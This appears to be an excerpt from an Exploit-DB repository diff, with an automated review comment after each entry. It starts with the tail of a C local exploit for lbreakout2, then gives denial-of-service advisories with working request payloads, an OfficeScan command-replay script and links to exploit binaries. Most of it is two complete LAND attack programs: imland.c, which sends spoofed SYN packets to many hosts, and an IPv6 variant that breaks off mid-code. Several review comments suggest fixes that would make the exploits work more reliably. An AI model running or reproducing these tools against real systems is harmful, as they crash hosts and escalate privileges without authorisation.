ptr = (char *)addr_ptr;
*ptr = 0;
setenv("HOME",buffer,1);
return 0;
}
int
bruteforce(long start)
{
int ret;
long i;
fprintf(stdout,"[+] Starting bruteforcing...\n");
for(i=start;i<0;i=i-50)
{
fprintf(stdout,"[+] Testing 0x%x...\n",i);
make_string(i);
ret=tease();
if(ret==0)
{
fprintf(stdout,"[+] Ret address found: 0x%x\n",i);
break;
}
}
return 0;
}
void
banner(char *argv)
{
fprintf(stderr,"lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr\n");
fprintf(stderr,"vulnerability reported by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se>\n");
fprintf(stderr,"usage: %s [-r <RET>][-b [-s <STARTING_RET>]]\n",argv);
exit(1);
}
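Review bot: `memset`, `memcpy` and `strlen` are used without `<string.h>`, and the brute-force loop `for(i=start;i<0;i=i-50)` only runs when `long` is 32 bits, because `D_START 0xbfffffff` is negative only then; on a 64-bit build the loop body never executes and the exploit silently reports nothing. Use `unsigned long` with an explicit lower bound and match the format (`%lx`, not `%x`). `make_string()` also `malloc`s 1024 bytes on every call and never frees, so a long brute-force run leaks steadily. Finally, the success test `if(ret==0)` in `bruteforce()` treats any zero exit status of the child as a found return address, so "Ret address found" fires if lbreakout2 simply exits cleanly without a shell having been spawned; the message should say what was observed rather than assert success.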

150
platforms/multiple/dos/10327.txt Executable file

@ -0,0 +1,150 @@
Ghostscript is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied input.
Exploiting this issue allows remote attackers to crash the application and possibly to execute code, but this has not been confirmed.
Vulnerable: Ubuntu Ubuntu Linux 8.10 sparc
Ubuntu Ubuntu Linux 8.10 powerpc
Ubuntu Ubuntu Linux 8.10 lpia
Ubuntu Ubuntu Linux 8.10 i386
Ubuntu Ubuntu Linux 8.10 amd64
Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 10_x86
Sun Solaris 10
Sun OpenSolaris build snv_99
Sun OpenSolaris build snv_96
Sun OpenSolaris build snv_95
Sun OpenSolaris build snv_94
Sun OpenSolaris build snv_93
Sun OpenSolaris build snv_92
Sun OpenSolaris build snv_91
Sun OpenSolaris build snv_90
Sun OpenSolaris build snv_89
Sun OpenSolaris build snv_88
Sun OpenSolaris build snv_87
Sun OpenSolaris build snv_86
Sun OpenSolaris build snv_85
Sun OpenSolaris build snv_84
Sun OpenSolaris build snv_83
Sun OpenSolaris build snv_82
Sun OpenSolaris build snv_81
Sun OpenSolaris build snv_80
Sun OpenSolaris build snv_78
Sun OpenSolaris build snv_77
Sun OpenSolaris build snv_76
Sun OpenSolaris build snv_68
Sun OpenSolaris build snv_67
Sun OpenSolaris build snv_64
Sun OpenSolaris build snv_61
Sun OpenSolaris build snv_59
Sun OpenSolaris build snv_57
Sun OpenSolaris build snv_54
Sun OpenSolaris build snv_50
Sun OpenSolaris build snv_47
Sun OpenSolaris build snv_45
Sun OpenSolaris build snv_39
Sun OpenSolaris build snv_36
Sun OpenSolaris build snv_29
Sun OpenSolaris build snv_22
Sun OpenSolaris build snv_19
Sun OpenSolaris build snv_13
Sun OpenSolaris build snv_114
Sun OpenSolaris build snv_113
Sun OpenSolaris build snv_112
Sun OpenSolaris build snv_111a
Sun OpenSolaris build snv_111
Sun OpenSolaris build snv_110
Sun OpenSolaris build snv_109
Sun OpenSolaris build snv_108
Sun OpenSolaris build snv_107
Sun OpenSolaris build snv_106
Sun OpenSolaris build snv_105
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_103
Sun OpenSolaris build snv_102
Sun OpenSolaris build snv_101a
Sun OpenSolaris build snv_101
Sun OpenSolaris build snv_100
Sun OpenSolaris build snv_02
Sun OpenSolaris build snv_01
S.u.S.E. SUSE Linux Enterprise Server 9
S.u.S.E. SLE 11
S.u.S.E. SLE 10
S.u.S.E. openSUSE 11.1
S.u.S.E. openSUSE 11.0
S.u.S.E. openSUSE 10.3
S.u.S.E. Open-Enterprise-Server 0
S.u.S.E. Novell Linux Desktop 9
rPath rPath Linux 2
RedHat Fedora 9 0
RedHat Fedora 8 0
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux Desktop Workstation 5 client
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1 IA64
RedHat Enterprise Linux AS 2.1
RedHat Enterprise Linux Desktop version 4
RedHat Enterprise Linux 5 server
RedHat Desktop 3.0
Pardus Linux 2008 0
MandrakeSoft Linux Mandrake 2009.0 x86_64
MandrakeSoft Linux Mandrake 2009.0
MandrakeSoft Linux Mandrake 2008.1 x86_64
MandrakeSoft Linux Mandrake 2008.1
MandrakeSoft Linux Mandrake 2008.0 x86_64
MandrakeSoft Linux Mandrake 2008.0
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 4.0
Ghostscript Ghostscript 8.15.2
Ghostscript Ghostscript 8.0.1
Ghostscript Ghostscript 8.61
Ghostscript Ghostscript 8.60
Ghostscript Ghostscript 8.57
Ghostscript Ghostscript 8.56
Ghostscript Ghostscript 8.54
Ghostscript Ghostscript 8.15
Avaya Proactive Contact 3.0.2
Avaya Proactive Contact 4.1
Avaya Proactive Contact 4.0
Avaya Proactive Contact 3.0
Avaya Proactive Contact 0
Avaya Messaging Storage Server MSS 3.0
Avaya Messaging Storage Server MM3.0
Avaya Messaging Storage Server 5.0
Avaya Messaging Storage Server 4.0
Avaya Messaging Storage Server 3.1
Avaya Messaging Storage Server 2.0
Avaya Messaging Storage Server 1.0
Avaya Messaging Storage Server
Avaya Message Networking MN 3.1
Avaya Message Networking 3.1
Avaya Message Networking
Avaya Intuity AUDIX LX 2.0 SP2
Avaya Intuity AUDIX LX 2.0 SP1
Avaya Intuity AUDIX LX 2.0
Avaya Intuity AUDIX LX 1.0
Avaya Intuity AUDIX
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)
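Review bot: The entry is advisory text plus a pointer to an external PDF; it names neither the vendor advisory nor the first fixed Ghostscript release, so a reader cannot tell whether 8.61 (the newest version listed) is the last affected build or merely the newest one tested. Add the fix reference next to the Exploit-DB mirror link, and keep the second sentence's "not been confirmed" qualifier attached to the code-execution claim wherever the entry is summarised.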


@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/267/info
A set of vulnerabilities in the counter.exe web hit counter program enables denial of service attacks.
A malicious user can create a malformed like ",1" entry in the counter.log file by requesting a URL of the form "http://www.example.com/scripts/counter.exe?%0A". Any further attempt for request will result in an Access Violation in counter.exe.
A similar vulnerability exists if a user requests a URL of the form "http://www.example.com/scripts/counter.exe?AAAAA" with over 2200 A's.
All further requests for counter.exe are queued and are not processed until the error messages are cleared at the console. System memory may be decremented each time a request for counter.exe is queued.
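Review bot: The description names the binary (`counter.exe`) but not the vendor, product or affected version, so the file cannot be matched to an inventory; add those from the securityfocus entry. It should also say that the `%0A` case is persistent (the malformed `",1"` entry stays in `counter.log`, so every later request fails until the log is cleaned), which is the operational difference from the long-argument case.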


@ -0,0 +1,5 @@
source: http://www.securityfocus.com/bid/288/info
Servers running PCAnywhere32 with TCP/IP networking are subject to a Denial of Service attack that will hang the server at 100% CPU utilization. A malicious user may initiate this DoS by connecting to tcp port 5631 on the PCAnywhere server input a large amount of data when prompted with "Please press <Enter>".
Connect to tcp 5631. At the Please press <Enter> prompt, transfer a large amount of data to the PCAnywhere server. This will peg the CPU utilization at 100%.
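Review bot: The last line restates the preceding paragraph almost verbatim (connect to TCP 5631, send a large amount of data at the `Please press <Enter>` prompt, CPU pegged at 100%); keep one copy. The entry also omits the PCAnywhere32 version tested and whether a fixed release exists.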


@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/1013/info
Trend Micro OfficeScan is an antivirus software program which is deployable across an entire network. During the installation of the management software, the administrator is asked to choose between managing from a webserver or from a fileserver. If the webserver option is chosen, clients running OfficeScan are configured to listen to port 12345 in order to receive periodical database engine updates and other administrative commands from the OfficeScan manager.
There are several ways for an attacker to cause various denial of service conditions.
Sending random data to port 12345 can cause tmlisten.exe to either consume 100% of the CPU cycles or cause a Visual C++ error and crash the machine.
Furthermore, opening over 5 simultaneous connections to port 12345 while sending random data will cause the service to stop responding to requests. The service will have to be stopped and restarted on each client machine.
It has also been reported that it is possible to cause a denial of service condition by making a single malformed GET request to port 12345.
It is also possible for a local user to capture an administrative command by using a network sniffer. This command can then be modified and replayed against other clients to cause them to perform a variety of actions. Modifying the last two bytes of the request will change the client's response behaviour, including:
04: full uninstallation of the OfficeScan client
06: launch a scan
07: stop a scan
The client makes requests to a few CGI programs on the server, which respond with configuration information. One of these CGIs is cgiRqCfg.exe, which provides configuration details for scan behaviour.
If an attacker were to set up a webserver with the same IP address as the valid server, duplicate the valid server's OfficeScan file structure, and disable the valid server, it would be possible to perform a more subtle DoS by leaving the client installed but modifying the config files to restrict the file types scanned, (for example: setting the client to only scan .txt files) or to restrict the types of drives scanned (for example: disabling scanning on removable, fixed, and CD-ROM drives). It is also possible to cause the client to move any infected files to any location on the local machine.
It should also be noted that some intrusion detection systems may detect attacks against port 12345 as Back Orifice attempts, which has the potential to conceal the nature of these attacks.
cgiRqCfg.exe provides to the client configuration settings which will disable scanning on all removable, fixed, and CDrom drives, and further will disable scanning for all files except those with the extension "YES IT's P0SS1bl3!"
cgiOnStart.exe will need to be put on the attacking webserver as the client expects it.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-1.exe
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-2.exe
this script will replay the request to the client, and may be launched from any machine. Modify for your installation and desired client response.
#!/bin/sh
(
sleep 2
echo "GET/?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906HTTP/1.0"
echo "Host: "$1":12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept: */*"
echo
echo
sleep 5
)| telnet $1 12345 2>&1 | tee -a ./log.txt
Trend Micro Officescan Denial of Service (tmosdos.zip) was contributed by Marc Ruef <marc.ruef@computec.ch>. This tool is a pre-compiled Windows binary with Visual Basic source.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19780-3.zip
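Review bot: The replay script sends the captured hex command in the GET line unchanged and with no freshness value, which is the defensive takeaway of the entry: the OfficeScan client accepts any previously captured command, so the remedy is an authenticated command channel on port 12345 rather than filtering. The script also leaves `$1` unquoted in both the `Host:` header and the `telnet` call and appends every exchange to `./log.txt` in the current directory; quote the argument and state which client version (the User-Agent advertises `OfficeScan/3.5`) the replay and the two linked binaries were verified against.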


@ -0,0 +1,5 @@
source: http://www.securityfocus.com/bid/1246/info
By default JetAdmin Web Interface Server listens on port 8000. If a malformed URL request is sent to port 8000 this will cause the server services to stop responding. The service must be stopped and restarted to regain normal functionality.
http://target:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$
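Review bot: The request line ends in `$`, which reads as a truncated payload rather than a complete URL; confirm whether the original ended there and say so. The text also gives only the default port, not the JetAdmin Web Interface Server version the hang was reproduced on.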


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/1713/info
The OverView5 CGI interface by default is shipped with HP Openview Node Manager.
HP Openview Node Manager can be compromised due to an unchecked buffer. By sending a specially crafted GET request comprised of 136 bytes to the web services (default port 80) through the Overview5 CGI interface, the SNMP service will crash.
Successful exploitation, depending on the data entered, will allow the execution of arbitrary code.
http://target/OvCgi/OpenView5.exe?Context=Snmp&Action=Snmp&Host=&Oid=<string of characters consisting of 136 bytes>
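Review bot: The third paragraph asserts that arbitrary code execution is possible "depending on the data entered", but nothing in the entry supports more than the SNMP service crash that the 136-byte `Oid` request produces; cite the source of the code-execution claim or mark it unconfirmed. The CGI is spelled `OverView5`, `Overview5` and `OpenView5.exe` in three places; use the binary's real name consistently.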


@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/1868/info
Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc.
eWave ServletExec is susceptible to a denial of service attack if a URL invoking the ServletExec servlet preceded by /servlet is requested. The ServletExec engine will attempt to bind a server thread over port 80 and if the web server is currently running, a java.net.BindException error will result thus halting all operations on the ServletExec engine. The web server is not affected by this vulnerability. Restarting the application is required in order to regain normal functionality.
http://target/servlet/ServletExec
or
nc 10.0.0.1 80
GET /servlet/ServletExec HTTP/1.0
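Review bot: The two usage forms use different placeholders, `target` in the URL and the literal `10.0.0.1` in the `nc` line; use one placeholder so the literal address is not mistaken for a real host. The entry should also name the ServletExec version tested, since the text lists several web servers it plugs into but no release.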


@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/2442/info
SurgeFTP is a FTP Server distributed and maintained by Netwin. SurgeFTP is a configurable, easily maintained ftp server, functional on both the UNIX and Windows platforms.
A problem with the SurgeFTP program could allow a denial of service to legitimate users. This is due to the handling of malformed requests made by a client. It is possible to cause the server to cease functioning by logging in, and requesting a list of first the root directory, then a list of the directory above the root directory. Upon receiving the request, the ftp server resets connections, and ceases operating.
Therefore, it is possible for a malicious user to deny service to legitimate users by passing the predescribed request to the ftp server.
# ftp localhost
Connected to testbak
220 SurgeFTP testbak (Version 1.0b)
User (testbak:(none)): anonymous
331 Password required for anonymous.
Password:
230- Alias Real path Access
230- / /home read
230 User anonymous logged in.
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/)
226 Transfer complete.
ftp> ls ..
200 Port command successful.
550 Opening ASCII mode data connection for file list. (/..)
-> ftp get:Connection reset by peer
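Review bot: The session log skips the `ftp> ls` command that produced the first listing (between `230 User anonymous logged in.` and `226 Transfer complete.`), so the two-step trigger the text describes (list the root, then list its parent) is hard to follow from the log alone; add the missing prompt line. The `550` reply on the `ls ..` step carries a 150-style "Opening ASCII mode" text; if that is what the server returned, say so, since it otherwise looks like a transcription slip.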

platforms/multiple/dos/20810.c Executable file

@ -0,0 +1,381 @@
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
/*
* imland - improved multiple land
*
* A good spanking session requires several good, hard slaps.
*
* This program lands multiple land attacks on multiple hosts as a
* proof of concept of the oldly discovered but newly resurfaced
* M$ `land' attack vulnerability. It was written without ill intent to
* test a large range of servers for vulnerabilities in one go.
*
* If the targeted machines freeze up for 5-30 seconds for each packet,
* that means they are vulnerable.
*
* Disclaimer:
* This program was written without ill intent. It was designed to test
* and prove the effects of the LAND attack on multiple hosts at once.
* I am in no way responsible for what you do with this piece of code.
*
* Please use it responsibly to test your own servers only.
*
*/
#define _BSD_SOURCE
#define __FAVOR_BSD
#include <stdio.h>
#include <ctype.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
/* the attack packet */
struct raw_tcp_packet {
struct ip ip;
struct tcphdr tcp;
};
/* required to make the TCP checksum correct */
struct tcp_chksum_hdr {
struct in_addr src;
struct in_addr dest;
u_char zero;
u_char proto;
u_short len;
struct tcphdr tcp;
};
/* linked list with all we need, really */
typedef struct target {
struct sockaddr_in sa;
struct {
struct iphdr ip; /* included here so we can build them once */
struct tcphdr tcp; /* and thus transmit a tiny bit faster */
} pkt;
struct target *next;
} target;
/** prototypes **/
int send_land(int, struct target *);
void u_sleep(u_int);
int add_target_ip(char *, struct in_addr *, u_short);
u_int get_timevar(const char *);
int add_target(char *);
unsigned short chksum(unsigned short *, int);
void finish(int);
void crash(const char *, ...);
void usage(void);
/** external **/
extern int optind, opterr, optopt;
extern int h_errno;
extern char *optarg;
extern char *__progname;
/** global variables **/
target *list = NULL, *cursor = NULL;
int targets = 0;
int pkt_interval = 0; /* no delay by default */
int pkts = 1, pkts_sent = 0; /* send one per host by default */
int debug = 0;
u_short defport = 139; /* default port */
/** code start **/
void crash(const char *fmt, ...)
{
va_list ap;
printf("%s: ", __progname);
va_start(ap, fmt);
vprintf(fmt, ap);
va_end(ap);
if(errno) printf(": %s", strerror(errno));
puts("");
exit(3);
}
int main(int argc, char **argv)
{
target *host;
int sock, foo;
if((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
crash("socket()");
while((foo = getopt(argc, argv, "v:i:p:n:")) != EOF) {
switch(foo) {
case 'v':
debug++;
break;
case 'i':
pkt_interval = get_timevar(optarg);
break;
case 'p':
defport = (u_short)strtoul(optarg, NULL, 0);
break;
case 'n':
pkts = strtoul(optarg, NULL, 0);
if(debug) printf("Sending %d packets\n", pkts);
break;
default:
add_target(optarg);
break;
}
}
argv = &argv[optind];
while(*argv) {
add_target(*argv);
argv++;
}
if(!targets) usage();
while(!pkts || pkts > pkts_sent) {
host = list;
while(host) {
printf("Sending to %s:%u ... ",
inet_ntoa(host->sa.sin_addr),
host->sa.sin_port);
foo = send_land(sock, host);
if(foo == - 1) printf("failed - %s\n", strerror(errno));
else printf("ok, landed %d bytes\n", foo);
if(pkt_interval) u_sleep(pkt_interval);
host = host->next;
}
pkts_sent++;
}
return 0;
}
/* build and send the land attack packet */
int send_land(int sock, struct target *host)
{
struct raw_tcp_packet pkt;
struct tcp_chksum_hdr tcc;
memset(&pkt, 0, sizeof(pkt));
memset(&tcc, 0, sizeof(tcc));
/* ip options */
pkt.ip.ip_v = IPVERSION;
pkt.ip.ip_hl = sizeof(struct iphdr) / 4;
pkt.ip.ip_tos = 0;
pkt.ip.ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
pkt.ip.ip_off = htons(IP_DF);
pkt.ip.ip_ttl = 0xff;
pkt.ip.ip_p = IPPROTO_TCP;
pkt.ip.ip_src = pkt.ip.ip_dst = host->sa.sin_addr;
pkt.ip.ip_sum = chksum((u_short *)&pkt.ip, sizeof(struct iphdr));
tcc.src = tcc.dest = host->sa.sin_addr;
tcc.zero = 0;
tcc.proto = IPPROTO_TCP;
tcc.len = htons(sizeof(struct tcphdr));
tcc.tcp.th_sport = tcc.tcp.th_dport = htons(host->sa.sin_port);
tcc.tcp.th_seq = htons(0x1d1);
tcc.tcp.th_off = sizeof(struct ip) / 4;
tcc.tcp.th_flags = TH_SYN;
tcc.tcp.th_win = htons(512);
memcpy(&pkt.tcp, &tcc.tcp, sizeof(struct tcphdr));
pkt.tcp.th_sum = chksum((u_short *)&tcc, sizeof(tcc));
return sendto(sock, &pkt, sizeof(pkt), 0, (struct sockaddr *)&host->sa,
sizeof(struct sockaddr_in));
}
/* calculate checksum */
u_short chksum(u_short *p, int n)
{
register long sum = 0;
while(n > 1) {
sum += *p++;
n -= 2;
}
/* mop up the occasional odd byte */
if(n == 1) sum += *(u_char *)p;
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum = sum + (sum >> 16); /* add carry */
return ~sum; /* ones-complement, truncate */
}
/* usleep() the portable way. No error checking is done,
* so this might theoretically fail. */
void u_sleep(u_int u_sec)
{
struct timeval to;
fd_set readset, writeset;
if(debug > 3) printf("sleeping for %u microseconds\n", u_sec);
if(!u_sec) return;
to.tv_sec = u_sec / 1000000;
to.tv_usec = u_sec % 1000000;
FD_ZERO(&writeset);
FD_ZERO(&readset);
select(0, &readset, &writeset, NULL, &to);
return;
}
int add_target_ip(char *arg, struct in_addr *in, u_short port)
{
struct target *host;
/* disregard obviously stupid addresses */
if(in->s_addr == INADDR_NONE || in->s_addr == INADDR_ANY)
return -1;
if(debug) printf("Adding %s:%u to target list\n", inet_ntoa(*in), port);
/* add the fresh ip */
host = malloc(sizeof(struct target));
if(!host) {
crash("add_target_ip(%s, %s): malloc(%d) failed",
arg, inet_ntoa(*in), sizeof(struct target));
}
memset(host, 0, sizeof(struct target));
/* fill out the sockaddr_in struct */
host->sa.sin_family = AF_INET;
host->sa.sin_addr.s_addr = in->s_addr;
host->sa.sin_port = port ? port : defport;
if(!list) list = host;
else cursor->next = host;
cursor = host;
targets++;
return 0;
}
/* wrapper for add_target_ip to resolve stuff as well */
int add_target(char *arg)
{
int i;
struct hostent *he;
struct in_addr *in, ip;
char *port_str;
u_short port = 0;
if(!arg) return -1;
if((port_str = strchr(arg, ':'))) {
*port_str = '\0';
port_str++;
if(*port_str) port = (u_short)strtoul(port_str, NULL, 0);
}
/* don't resolve if we don't have to */
if(inet_aton(arg, &ip)) return add_target_ip(arg, &ip, port);
/* not an IP, so resolve */
errno = 0;
he = gethostbyname(arg);
if(!he && h_errno == TRY_AGAIN) {
u_sleep(500000);
he = gethostbyname(arg);
}
if(!he) crash("Failed to resolve %s: %s", arg, hstrerror(h_errno));
/* add all the IP's as targets */
for(i = 0; he->h_addr_list[i]; i++) {
in = (struct in_addr *)he->h_addr_list[i];
add_target_ip(arg, in, port);
}
return 0;
}
/*
* u = micro
* m = milli
* s = seconds
* return value is in microseconds
*/
u_int get_timevar(const char *str)
{
char p, u, *ptr;
unsigned int len;
u_int i, d; /* integer and decimal, respectively */
u_int factor = 1000; /* default to milliseconds */
if(!str) return 0;
len = strlen(str);
if(!len) return 0;
/* unit might be given as ms|m (millisec),
* us|u (microsec) or just plain s, for seconds */
u = p = '\0';
u = str[len - 1];
if(len >= 2 && !isdigit((int)str[len - 2])) p = str[len - 2];
if(p && u == 's') u = p;
else if(!p) p = u;
if(debug > 3) printf("evaluating %s, u: %c, p: %c\n", str, u, p);
if(u == 'u') factor = 1; /* microseconds */
else if(u == 'm') factor = 1000; /* milliseconds */
else if(u == 's') factor = 1000000; /* seconds */
if(debug > 3) printf("factor is %u\n", factor);
i = strtoul(str, &ptr, 0);
if(!ptr || *ptr != '.' || strlen(ptr) < 2 || factor == 1)
return i * factor;
/* time specified in usecs can't have decimal points, so ignore them */
if(factor == 1) return i;
d = strtoul(ptr + 1, NULL, 0);
/* d is decimal, so get rid of excess baggage */
while(d >= factor) d /= 10;
/* the last parenthesis avoids floating point exceptions. */
return ((i * factor) + (d * (factor / 10)));
}
void usage(void)
{
printf("Usage: %s -i <interval> -p <port> -n <pkts> host1:port1 hostn:portn\n\n",
__progname);
printf("-i sets packet interval in milliseconds.\n");
printf(" You can specify Nus for N microseconds, or Ns for N seconds.\n");
printf(" Default is 0, which is good for multiple hosts and one packet.\n");
printf(" If you want to send continuously, specify 1s or more, so as to not\n");
printf(" cause DoS due to sheer traffic volume.\n\n");
printf("-p sets the DEFAULT port (139 if not specified)\n\n");
printf("-n determines how many packets to send to each target. Default is 1\n\n");
printf("host:port combinations can be given as such; 207.46.130.108:80\n");
printf("The port part of a target definition ovverrides the defaults.\n\n");
printf("Hostnames will be resolved, if possible.\n");
exit(1);
}
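Review bot: `target.pkt` (the `iphdr`/`tcphdr` pair the comment says is built once so transmission is faster) is never filled or read; `send_land` builds a fresh `raw_tcp_packet` on the stack on every call, so drop the member or use it. The `getopt` string declares `-v` as taking an argument (`v:`) while the `v` case only does `debug++`, so `-v` silently consumes the next argument, and the `default:` branch calls `add_target(optarg)` for unknown options, where `optarg` is not set. The file also uses `memset`, `memcpy`, `strchr`, `strlen`, `inet_ntoa`, `inet_aton` and `select` without including `string.h`, `arpa/inet.h` or `sys/select.h`.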

platforms/multiple/dos/20811.cpp Executable file

@ -0,0 +1,247 @@
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
//
// Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} fe80::2a1:b0ff:fe08:8bcc 135
//
// Written by: Konrad Malewski.
//
#include <stdlib.h>
#include <stdio.h>
#include <Winsock2.h>
#include <ws2tcpip.h>
#include <pcap.h>
#include <remote-ext.h>
///////////////////////////////////////////////////////////////////////////////
///////////// from libnet /////////////
/* ethernet addresses are 6 octets long */
#define ETHER_ADDR_LEN 0x6
typedef unsigned char u_int8_t;
typedef unsigned short u_int16_t;
typedef unsigned int u_int32_t;
typedef unsigned __int64 u_int64_t;
/*
* Ethernet II header
* Static header size: 14 bytes
*/
struct libnet_ethernet_hdr
{
u_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */
u_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */
u_int16_t ether_type; /* protocol */
};
struct libnet_in6_addr
{
union
{
u_int8_t __u6_addr8[16];
u_int16_t __u6_addr16[8];
u_int32_t __u6_addr32[4];
} __u6_addr; /* 128-bit IP6 address */
};
/*
* IPv6 header
* Internet Protocol, version 6
* Static header size: 40 bytes
*/
struct libnet_ipv6_hdr
{
u_int8_t ip_flags[4]; /* version, traffic class, flow label */
u_int16_t ip_len; /* total length */
u_int8_t ip_nh; /* next header */
u_int8_t ip_hl; /* hop limit */
struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */
};
/*
* TCP header
* Transmission Control Protocol
* Static header size: 20 bytes
*/
struct libnet_tcp_hdr
{
u_int16_t th_sport; /* source port */
u_int16_t th_dport; /* destination port */
u_int32_t th_seq; /* sequence number */
u_int32_t th_ack; /* acknowledgement number */
u_int8_t th_x2:4, /* (unused) */
th_off:4; /* data offset */
u_int8_t th_flags; /* control flags */
u_int16_t th_win; /* window */
u_int16_t th_sum; /* checksum */
u_int16_t th_urp; /* urgent pointer */
};
int libnet_in_cksum(u_int16_t *addr, int len)
{
int sum;
union
{
u_int16_t s;
u_int8_t b[2];
}pad;
sum = 0;
while (len > 1)
{
sum += *addr++;
len -= 2;
}
if (len == 1)
{
pad.b[0] = *(u_int8_t *)addr;
pad.b[1] = 0;
sum += pad.s;
}
return (sum);
}
#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff))
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
u_char packet[74];
struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14);
struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54);
struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet;
u_char errbuf[1024];
pcap_t *pcap_handle;
void usage(char* n)
{
pcap_if_t * alldevs,*d;
int i=1;
fprintf(stdout,"Usage:\n"
"\t %s <device> <victim> <port>\n",n);
if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1)
{
fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf);
exit(EXIT_FAILURE);
}
printf("Avaliable adapters: \n");
d = alldevs;
while (d!=NULL)
{
printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description);
d = d->next;
}
pcap_freealldevs (alldevs);
}
///////////////////////////////////////////////////////////////////////////////
int main(int argc, char* argv[])
{
if ( argc<4 )
{
usage(argv[0]);
return EXIT_FAILURE;
}
int retVal;
struct addrinfo hints,*addrinfo;
ZeroMemory(&hints,sizeof(hints));
WSADATA wsaData;
if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR )
{
fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError());
return EXIT_FAILURE;
}
//
// Get MAC address of remote host (assume link local IpV6 address)
//
hints.ai_family = PF_INET6;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
